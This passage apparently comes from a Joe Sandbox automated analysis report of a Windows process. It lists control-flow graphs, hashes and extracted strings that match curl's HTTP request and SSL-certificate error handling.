filename '%s'$failed to truncate, exiting$http$ -$'$0)$9J$@)$g5$lR$+$,
                                      • API String ID: 1288461809-2728117200
                                      • Opcode ID: ea878cc36582f55c76bbea4af61f353ac2dc4c20d7ab674798d58a685870b32f
                                      • Instruction ID: 0909a045da43daca7f723ea80158fb3db8143e12ccb33c113b163c445bf1bfa9
                                      • Opcode Fuzzy Hash: ea878cc36582f55c76bbea4af61f353ac2dc4c20d7ab674798d58a685870b32f
                                      • Instruction Fuzzy Hash: D9A2C562A0C78246EB25EB2194501B9EBA1FF4C784F840136E97D4B7D9DF3CE508E798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID: %s$%s $%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s$%s%s$%s%s=%s$%x$/$0$1.0$1.1$100-continue$;type=$;type=%c$Accept-Encoding:$Accept-Encoding: %s$Accept:$Accept: */*$Chunky upload is not supported by HTTP 1.0$Content-Length:$Content-Length: %I64d$Content-Length: 0$Content-Range:$Content-Range: bytes %s%I64d/%I64d$Content-Range: bytes %s/%I64d$Content-Range: bytes 0-%I64d/%I64d$Content-Type:$Content-Type: application/x-www-form-urlencoded$Cookie:$Cookie: $Could not get Content-Type header line!$Could not seek stream$Could only read %I64d bytes from the input$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request$File already completely uploaded$GET$HEAD$Host:$Host: %s%s%s$Host: %s%s%s:%hu$OPTIONS$POST$PUT$Proxy-Connection:$Proxy-Connection: Keep-Alive$Range:$Range: bytes=%s$Referer:$Referer: %s$Transfer-Encoding:$Transfer-Encoding: chunked$User-Agent:$chunked$ftp://$ftp://%s:%s@%s$upload completely sent off: %I64d out of %I64d bytes
                                      • API String ID: 1294909896-3246751705
                                      • Opcode ID: 3e6cb406950072a1e4afd668f84cd9d1b9732f48608da7789d27830b1e806f9d
                                      • Instruction ID: a017dc3f422298261ed506c7380aee92238dfc677ee0fa8092bd765b42532880
                                      • Opcode Fuzzy Hash: 3e6cb406950072a1e4afd668f84cd9d1b9732f48608da7789d27830b1e806f9d
                                      • Instruction Fuzzy Hash: 2CE28061A0DB8281EB64EB21A4406BAE390FF497D4F844136CA7D477D5DF7CE408E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 884 7ff7f8d07f2c-7ff7f8d07f47 _strdup 885 7ff7f8d07f5e-7ff7f8d07f65 884->885 886 7ff7f8d07f49 884->886 887 7ff7f8d07f85-7ff7f8d07f8e 885->887 888 7ff7f8d07f67-7ff7f8d07f7f _strdup 885->888 886->885 890 7ff7f8d07fb5-7ff7f8d07fbc 887->890 891 7ff7f8d07f90-7ff7f8d07f93 887->891 888->887 889 7ff7f8d07eba-7ff7f8d07ec2 888->889 892 7ff7f8d0af9a-7ff7f8d0afa4 889->892 895 7ff7f8d07fbe-7ff7f8d07fc5 890->895 896 7ff7f8d07fcb-7ff7f8d07fe3 call 7ff7f8d0b848 890->896 893 7ff7f8d08138-7ff7f8d0815d 891->893 894 7ff7f8d07f99-7ff7f8d07fa3 891->894 900 7ff7f8d0afaa-7ff7f8d0afac 892->900 901 7ff7f8d0b03d-7ff7f8d0b03f 892->901 905 7ff7f8d0816a-7ff7f8d0816c 893->905 906 7ff7f8d0815f-7ff7f8d08168 893->906 894->890 899 7ff7f8d07fa5-7ff7f8d07faf 894->899 895->893 895->896 917 7ff7f8d07fe5-7ff7f8d07ff5 896->917 918 7ff7f8d08024-7ff7f8d08029 896->918 899->890 899->893 903 7ff7f8d0b041-7ff7f8d0b048 900->903 907 7ff7f8d0afb2-7ff7f8d0afb6 900->907 901->903 904 7ff7f8d0b062-7ff7f8d0b081 fclose 901->904 903->904 909 7ff7f8d0b04a-7ff7f8d0b05b 903->909 926 7ff7f8d0b0a3-7ff7f8d0b0ac 904->926 927 7ff7f8d0b083-7ff7f8d0b09e call 7ff7f8d0fadc 904->927 912 7ff7f8d0817a 905->912 913 7ff7f8d0816e-7ff7f8d08171 905->913 906->905 911 7ff7f8d08173-7ff7f8d08178 906->911 907->901 914 7ff7f8d0afbc-7ff7f8d0afee call 7ff7f8d0fadc 907->914 909->904 925 7ff7f8d0b05d _fileno 909->925 915 7ff7f8d0817d-7ff7f8d081a2 call 7ff7f8d0b730 911->915 912->915 913->911 913->912 914->901 945 7ff7f8d0aff0-7ff7f8d0b033 call 7ff7f8d0fadc 914->945 952 7ff7f8d0af95 915->952 923 7ff7f8d08081-7ff7f8d0808c 917->923 924 7ff7f8d07ffb-7ff7f8d08002 917->924 918->892 934 7ff7f8d08093-7ff7f8d080ae call 7ff7f8d0239c 923->934 935 7ff7f8d0808e-7ff7f8d08091 923->935 924->923 933 7ff7f8d08004-7ff7f8d08019 call 7ff7f8d077b0 924->933 925->904 931 7ff7f8d0b0b8-7ff7f8d0b0e7 call 7ff7f8d49b20 free * 2 926->931 932 7ff7f8d0b0ae-7ff7f8d0b0b2 free 926->932 927->926 953 7ff7f8d0b0e9-7ff7f8d0b0f2 _close 931->953 954 7ff7f8d0b0f4-7ff7f8d0b101 931->954 932->931 955 7ff7f8d0801c-7ff7f8d0801f 933->955 934->952 957 7ff7f8d080b4 934->957 935->934 941 7ff7f8d080b6-7ff7f8d080ba 935->941 943 7ff7f8d080dd-7ff7f8d080f6 fopen 941->943 944 7ff7f8d080bc-7ff7f8d080d9 _stat64 941->944 958 7ff7f8d0811a-7ff7f8d08134 943->958 959 7ff7f8d080f8-7ff7f8d08115 call 7ff7f8d077b0 943->959 944->943 945->901 952->892 953->954 964 7ff7f8d0b117-7ff7f8d0b11b 954->964 965 7ff7f8d0b103-7ff7f8d0b111 954->965 955->904 957->941 958->893 959->955 967 7ff7f8d0b213-7ff7f8d0b22a free 964->967 968 7ff7f8d0b121-7ff7f8d0b12f 964->968 965->964 965->967 971 7ff7f8d0b22c-7ff7f8d0b22f call 7ff7f8d0dbbc 967->971 972 7ff7f8d0b234-7ff7f8d0b275 free 967->972 968->967 970 7ff7f8d0b135-7ff7f8d0b20d 968->970 970->967 976 7ff7f8d07e38-7ff7f8d07eb8 __acrt_iob_func _fileno call 7ff7f8d49b20 __acrt_iob_func _strdup 970->976 971->972 984 7ff7f8d0b277 call 7ff7f8d0dbbc 972->984 985 7ff7f8d0b27c-7ff7f8d0b2ad free * 3 972->985 976->889 984->985 987 7ff7f8d0b2bf-7ff7f8d0b2c1 985->987 988 7ff7f8d0b2af-7ff7f8d0b2bd 985->988 990 7ff7f8d0b2c9 987->990 991 7ff7f8d0b2c3-7ff7f8d0b2c7 987->991 988->987 989 7ff7f8d0b2db 988->989 990->989 991->989 991->990
                                      APIs
                                      Strings
                                      • %s%s%s, xrefs: 00007FF7F8D0B00C
                                      • Can't open '%s'!, xrefs: 00007FF7F8D080FC
                                      • HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
                                      • Remote file name has no length!, xrefs: 00007FF7F8D08008
                                      • curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
                                      • If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
                                      • -, xrefs: 00007FF7F8D081A2
                                      • (%d) Failed writing body, xrefs: 00007FF7F8D0B08F
                                      • A:E, xrefs: 00007FF7F8D07F9F
                                      • 9J, xrefs: 00007FF7F8D0B09E
                                      • More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
                                      • @), xrefs: 00007FF7F8D0B277
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$_strdup$_closefclose
                                      • String ID: %s%s%s$(%d) Failed writing body$A:E$Can't open '%s'!$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $Remote file name has no length!$curl: (%d) %s$9J$@)$-
                                      • API String ID: 2572271535-565506792
                                      • Opcode ID: 1bbe6de85b5b31cc5539167f76c9fd160aedc9c46436fa533e052f6251a5530c
                                      • Instruction ID: 63a6d5ac78991f073fea61cdc80535dd6d7b38d30b8bc3fe20a2ac804576e884
                                      • Opcode Fuzzy Hash: 1bbe6de85b5b31cc5539167f76c9fd160aedc9c46436fa533e052f6251a5530c
                                      • Instruction Fuzzy Hash: C1D1B422E0D78285FB61EB61945027DE7A1EF4C784FD80035DA7E476D8DE3CE448A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1115 7ff7f8d07c64-7ff7f8d07c72 1117 7ff7f8d07c76-7ff7f8d07c7d 1115->1117 1117->1117 1118 7ff7f8d07c7f-7ff7f8d07c8b malloc 1117->1118 1119 7ff7f8d07c91-7ff7f8d07cb2 call 7ff7f8d0da94 1118->1119 1120 7ff7f8d0b3f1 1118->1120 1121 7ff7f8d0b3f4-7ff7f8d0b3f8 free 1119->1121 1124 7ff7f8d07cb8-7ff7f8d07cd0 1119->1124 1120->1121 1125 7ff7f8d07cd6-7ff7f8d07cee 1124->1125 1126 7ff7f8d0b262 1124->1126 1128 7ff7f8d07cf5-7ff7f8d07d0c call 7ff7f8d0dc64 1125->1128 1129 7ff7f8d07cf0-7ff7f8d07cf3 1125->1129 1127 7ff7f8d0b264-7ff7f8d0b275 free 1126->1127 1131 7ff7f8d0b277 call 7ff7f8d0dbbc 1127->1131 1132 7ff7f8d0b27c-7ff7f8d0b2ad free * 3 1127->1132 1144 7ff7f8d07d1e-7ff7f8d07d65 1128->1144 1145 7ff7f8d07d0e-7ff7f8d07d19 call 7ff7f8d077b0 1128->1145 1129->1128 1133 7ff7f8d07d67-7ff7f8d07e02 1129->1133 1131->1132 1137 7ff7f8d0b2bf-7ff7f8d0b2c1 1132->1137 1138 7ff7f8d0b2af-7ff7f8d0b2bd 1132->1138 1146 7ff7f8d07e04-7ff7f8d07e0c 1133->1146 1147 7ff7f8d07e19-7ff7f8d07e24 1133->1147 1142 7ff7f8d0b2c9 1137->1142 1143 7ff7f8d0b2c3-7ff7f8d0b2c7 1137->1143 1138->1137 1141 7ff7f8d0b2db 1138->1141 1142->1141 1143->1141 1143->1142 1144->1133 1153 7ff7f8d07d54-7ff7f8d07d59 1144->1153 1145->1144 1150 7ff7f8d07e26 1146->1150 1151 7ff7f8d07e0e-7ff7f8d07e17 1146->1151 1147->1150 1152 7ff7f8d07e2a-7ff7f8d07e32 1147->1152 1150->1152 1151->1147 1151->1150 1154 7ff7f8d0b219-7ff7f8d0b22a free 1152->1154 1155 7ff7f8d07e38-7ff7f8d0afa4 __acrt_iob_func _fileno call 7ff7f8d49b20 __acrt_iob_func _strdup 1152->1155 1153->1127 1153->1133 1157 7ff7f8d0b22c-7ff7f8d0b22f call 7ff7f8d0dbbc 1154->1157 1158 7ff7f8d0b234-7ff7f8d0b25d 1154->1158 1167 7ff7f8d0afaa-7ff7f8d0afac 1155->1167 1168 7ff7f8d0b03d-7ff7f8d0b03f 1155->1168 1157->1158 1158->1126 1169 7ff7f8d0b041-7ff7f8d0b048 1167->1169 1171 7ff7f8d0afb2-7ff7f8d0afb6 1167->1171 1168->1169 1170 7ff7f8d0b062-7ff7f8d0b081 fclose 1168->1170 1169->1170 1172 7ff7f8d0b04a-7ff7f8d0b05b 1169->1172 1180 7ff7f8d0b0a3-7ff7f8d0b0ac 1170->1180 1181 7ff7f8d0b083-7ff7f8d0b09e call 7ff7f8d0fadc 1170->1181 1171->1168 1174 7ff7f8d0afbc-7ff7f8d0afee call 7ff7f8d0fadc 1171->1174 1172->1170 1179 7ff7f8d0b05d _fileno 1172->1179 1174->1168 1189 7ff7f8d0aff0-7ff7f8d0b033 call 7ff7f8d0fadc 1174->1189 1179->1170 1184 7ff7f8d0b0b8-7ff7f8d0b0e7 call 7ff7f8d49b20 free * 2 1180->1184 1185 7ff7f8d0b0ae-7ff7f8d0b0b2 free 1180->1185 1181->1180 1192 7ff7f8d0b0e9-7ff7f8d0b0f2 _close 1184->1192 1193 7ff7f8d0b0f4-7ff7f8d0b101 1184->1193 1185->1184 1189->1168 1192->1193 1196 7ff7f8d0b117-7ff7f8d0b11b 1193->1196 1197 7ff7f8d0b103-7ff7f8d0b111 1193->1197 1198 7ff7f8d0b213 1196->1198 1199 7ff7f8d0b121-7ff7f8d0b12f 1196->1199 1197->1196 1197->1198 1198->1154 1199->1198 1200 7ff7f8d0b135-7ff7f8d0b20d 1199->1200 1200->1155 1200->1198
                                      APIs
                                      Strings
                                      • %s%s%s, xrefs: 00007FF7F8D0B00C
                                      • HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
                                      • curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
                                      • If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
                                      • (%d) Failed writing body, xrefs: 00007FF7F8D0B08F
                                      • out of memory, xrefs: 00007FF7F8D07D12
                                      • 9J, xrefs: 00007FF7F8D0B09E
                                      • More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
                                      • @), xrefs: 00007FF7F8D0B277
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __acrt_iob_func$_fileno_strdupmalloc
                                      • String ID: %s%s%s$(%d) Failed writing body$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $curl: (%d) %s$out of memory$9J$@)
                                      • API String ID: 3583953570-1742031202
                                      • Opcode ID: 1a5dfdb6bc28182cc39c97a5e1452d3a960d4cb26f6decbe69135abea4f9d088
                                      • Instruction ID: b16c396b94d2bcb472043941a68ea3d175c90411a6b0f5c7510223bb74a882aa
                                      • Opcode Fuzzy Hash: 1a5dfdb6bc28182cc39c97a5e1452d3a960d4cb26f6decbe69135abea4f9d088
                                      • Instruction Fuzzy Hash: F1C1B032A0DB8285EB10EB61D44457DE7A5FF88784F940135DA7E476D8DF3CE448A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1202 7ff7f8d07c6a-7ff7f8d07c72 1204 7ff7f8d07c76-7ff7f8d07c7d 1202->1204 1204->1204 1205 7ff7f8d07c7f-7ff7f8d07c8b malloc 1204->1205 1206 7ff7f8d07c91-7ff7f8d07cb2 call 7ff7f8d0da94 1205->1206 1207 7ff7f8d0b3f1 1205->1207 1208 7ff7f8d0b3f4-7ff7f8d0b3f8 free 1206->1208 1211 7ff7f8d07cb8-7ff7f8d07cd0 1206->1211 1207->1208 1212 7ff7f8d07cd6-7ff7f8d07cee 1211->1212 1213 7ff7f8d0b262 1211->1213 1215 7ff7f8d07cf5-7ff7f8d07d0c call 7ff7f8d0dc64 1212->1215 1216 7ff7f8d07cf0-7ff7f8d07cf3 1212->1216 1214 7ff7f8d0b264-7ff7f8d0b275 free 1213->1214 1218 7ff7f8d0b277 call 7ff7f8d0dbbc 1214->1218 1219 7ff7f8d0b27c-7ff7f8d0b2ad free * 3 1214->1219 1231 7ff7f8d07d1e-7ff7f8d07d65 1215->1231 1232 7ff7f8d07d0e-7ff7f8d07d19 call 7ff7f8d077b0 1215->1232 1216->1215 1220 7ff7f8d07d67-7ff7f8d07e02 1216->1220 1218->1219 1224 7ff7f8d0b2bf-7ff7f8d0b2c1 1219->1224 1225 7ff7f8d0b2af-7ff7f8d0b2bd 1219->1225 1233 7ff7f8d07e04-7ff7f8d07e0c 1220->1233 1234 7ff7f8d07e19-7ff7f8d07e24 1220->1234 1229 7ff7f8d0b2c9 1224->1229 1230 7ff7f8d0b2c3-7ff7f8d0b2c7 1224->1230 1225->1224 1228 7ff7f8d0b2db 1225->1228 1229->1228 1230->1228 1230->1229 1231->1220 1240 7ff7f8d07d54-7ff7f8d07d59 1231->1240 1232->1231 1237 7ff7f8d07e26 1233->1237 1238 7ff7f8d07e0e-7ff7f8d07e17 1233->1238 1234->1237 1239 7ff7f8d07e2a-7ff7f8d07e32 1234->1239 1237->1239 1238->1234 1238->1237 1241 7ff7f8d0b219-7ff7f8d0b22a free 1239->1241 1242 7ff7f8d07e38-7ff7f8d0afa4 __acrt_iob_func _fileno call 7ff7f8d49b20 __acrt_iob_func _strdup 1239->1242 1240->1214 1240->1220 1244 7ff7f8d0b22c-7ff7f8d0b22f call 7ff7f8d0dbbc 1241->1244 1245 7ff7f8d0b234-7ff7f8d0b25d 1241->1245 1254 7ff7f8d0afaa-7ff7f8d0afac 1242->1254 1255 7ff7f8d0b03d-7ff7f8d0b03f 1242->1255 1244->1245 1245->1213 1256 7ff7f8d0b041-7ff7f8d0b048 1254->1256 1258 7ff7f8d0afb2-7ff7f8d0afb6 1254->1258 1255->1256 1257 7ff7f8d0b062-7ff7f8d0b081 fclose 1255->1257 1256->1257 1259 7ff7f8d0b04a-7ff7f8d0b05b 1256->1259 1267 7ff7f8d0b0a3-7ff7f8d0b0ac 1257->1267 1268 7ff7f8d0b083-7ff7f8d0b09e call 7ff7f8d0fadc 1257->1268 1258->1255 1261 7ff7f8d0afbc-7ff7f8d0afee call 7ff7f8d0fadc 1258->1261 1259->1257 1266 7ff7f8d0b05d _fileno 1259->1266 1261->1255 1276 7ff7f8d0aff0-7ff7f8d0b033 call 7ff7f8d0fadc 1261->1276 1266->1257 1271 7ff7f8d0b0b8-7ff7f8d0b0e7 call 7ff7f8d49b20 free * 2 1267->1271 1272 7ff7f8d0b0ae-7ff7f8d0b0b2 free 1267->1272 1268->1267 1279 7ff7f8d0b0e9-7ff7f8d0b0f2 _close 1271->1279 1280 7ff7f8d0b0f4-7ff7f8d0b101 1271->1280 1272->1271 1276->1255 1279->1280 1283 7ff7f8d0b117-7ff7f8d0b11b 1280->1283 1284 7ff7f8d0b103-7ff7f8d0b111 1280->1284 1285 7ff7f8d0b213 1283->1285 1286 7ff7f8d0b121-7ff7f8d0b12f 1283->1286 1284->1283 1284->1285 1285->1241 1286->1285 1287 7ff7f8d0b135-7ff7f8d0b20d 1286->1287 1287->1242 1287->1285
                                      APIs
                                      Strings
                                      • %s%s%s, xrefs: 00007FF7F8D0B00C
                                      • HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
                                      • curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
                                      • If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
                                      • (%d) Failed writing body, xrefs: 00007FF7F8D0B08F
                                      • out of memory, xrefs: 00007FF7F8D07D12
                                      • 9J, xrefs: 00007FF7F8D0B09E
                                      • More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
                                      • @), xrefs: 00007FF7F8D0B277
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __acrt_iob_func$_fileno_strdupmalloc
                                      • String ID: %s%s%s$(%d) Failed writing body$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $curl: (%d) %s$out of memory$9J$@)
                                      • API String ID: 3583953570-1742031202
                                      • Opcode ID: 5e52dbf63b134f8823531d00eb8c7ac55b0c68d4c22cf3ac356fc03a923e365f
                                      • Instruction ID: 279b3d89a3eb062f7a71e42d536c7e5ac4ee45a44cda3bf502486138d65696dd
                                      • Opcode Fuzzy Hash: 5e52dbf63b134f8823531d00eb8c7ac55b0c68d4c22cf3ac356fc03a923e365f
                                      • Instruction Fuzzy Hash: 0DC1B032A0DB8285EB10EB61D44057DE7A5FF88784F940135DA7E476D8DF3CE448A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1289 7ff7f8d07d82-7ff7f8d07d9f 1291 7ff7f8d07da3-7ff7f8d07da9 1289->1291 1291->1291 1292 7ff7f8d07dab-7ff7f8d07db7 malloc 1291->1292 1293 7ff7f8d07dbd-7ff7f8d07ddd call 7ff7f8d0da94 1292->1293 1294 7ff7f8d0b3c6-7ff7f8d0b3c9 1292->1294 1295 7ff7f8d0b3cb-7ff7f8d0b3ce free 1293->1295 1298 7ff7f8d07de3-7ff7f8d07e02 1293->1298 1294->1295 1301 7ff7f8d07e04-7ff7f8d07e0c 1298->1301 1302 7ff7f8d07e19-7ff7f8d07e24 1298->1302 1303 7ff7f8d07e26 1301->1303 1304 7ff7f8d07e0e-7ff7f8d07e17 1301->1304 1302->1303 1305 7ff7f8d07e2a-7ff7f8d07e32 1302->1305 1303->1305 1304->1302 1304->1303 1306 7ff7f8d0b219-7ff7f8d0b22a free 1305->1306 1307 7ff7f8d07e38-7ff7f8d0afa4 __acrt_iob_func _fileno call 7ff7f8d49b20 __acrt_iob_func _strdup 1305->1307 1309 7ff7f8d0b22c-7ff7f8d0b22f call 7ff7f8d0dbbc 1306->1309 1310 7ff7f8d0b234-7ff7f8d0b275 free 1306->1310 1321 7ff7f8d0afaa-7ff7f8d0afac 1307->1321 1322 7ff7f8d0b03d-7ff7f8d0b03f 1307->1322 1309->1310 1325 7ff7f8d0b277 call 7ff7f8d0dbbc 1310->1325 1326 7ff7f8d0b27c-7ff7f8d0b2ad free * 3 1310->1326 1323 7ff7f8d0b041-7ff7f8d0b048 1321->1323 1327 7ff7f8d0afb2-7ff7f8d0afb6 1321->1327 1322->1323 1324 7ff7f8d0b062-7ff7f8d0b081 fclose 1322->1324 1323->1324 1328 7ff7f8d0b04a-7ff7f8d0b05b 1323->1328 1342 7ff7f8d0b0a3-7ff7f8d0b0ac 1324->1342 1343 7ff7f8d0b083-7ff7f8d0b09e call 7ff7f8d0fadc 1324->1343 1325->1326 1330 7ff7f8d0b2bf-7ff7f8d0b2c1 1326->1330 1331 7ff7f8d0b2af-7ff7f8d0b2bd 1326->1331 1327->1322 1333 7ff7f8d0afbc-7ff7f8d0afee call 7ff7f8d0fadc 1327->1333 1328->1324 1341 7ff7f8d0b05d _fileno 1328->1341 1337 7ff7f8d0b2c9 1330->1337 1338 7ff7f8d0b2c3-7ff7f8d0b2c7 1330->1338 1331->1330 1336 7ff7f8d0b2db 1331->1336 1333->1322 1351 7ff7f8d0aff0-7ff7f8d0b033 call 7ff7f8d0fadc 1333->1351 1337->1336 1338->1336 1338->1337 1341->1324 1346 7ff7f8d0b0b8-7ff7f8d0b0e7 call 7ff7f8d49b20 free * 2 1342->1346 1347 7ff7f8d0b0ae-7ff7f8d0b0b2 free 1342->1347 1343->1342 1354 7ff7f8d0b0e9-7ff7f8d0b0f2 _close 1346->1354 1355 7ff7f8d0b0f4-7ff7f8d0b101 1346->1355 1347->1346 1351->1322 1354->1355 1358 7ff7f8d0b117-7ff7f8d0b11b 1355->1358 1359 7ff7f8d0b103-7ff7f8d0b111 1355->1359 1360 7ff7f8d0b213 1358->1360 1361 7ff7f8d0b121-7ff7f8d0b12f 1358->1361 1359->1358 1359->1360 1360->1306 1361->1360 1362 7ff7f8d0b135-7ff7f8d0b20d 1361->1362 1362->1307 1362->1360
                                      APIs
                                      Strings
                                      • %s%s%s, xrefs: 00007FF7F8D0B00C
                                      • HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
                                      • curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
                                      • If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
                                      • (%d) Failed writing body, xrefs: 00007FF7F8D0B08F
                                      • 9J, xrefs: 00007FF7F8D0B09E
                                      • More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
                                      • @), xrefs: 00007FF7F8D0B277
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __acrt_iob_func$_fileno_strdupmalloc
                                      • String ID: %s%s%s$(%d) Failed writing body$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $curl: (%d) %s$9J$@)
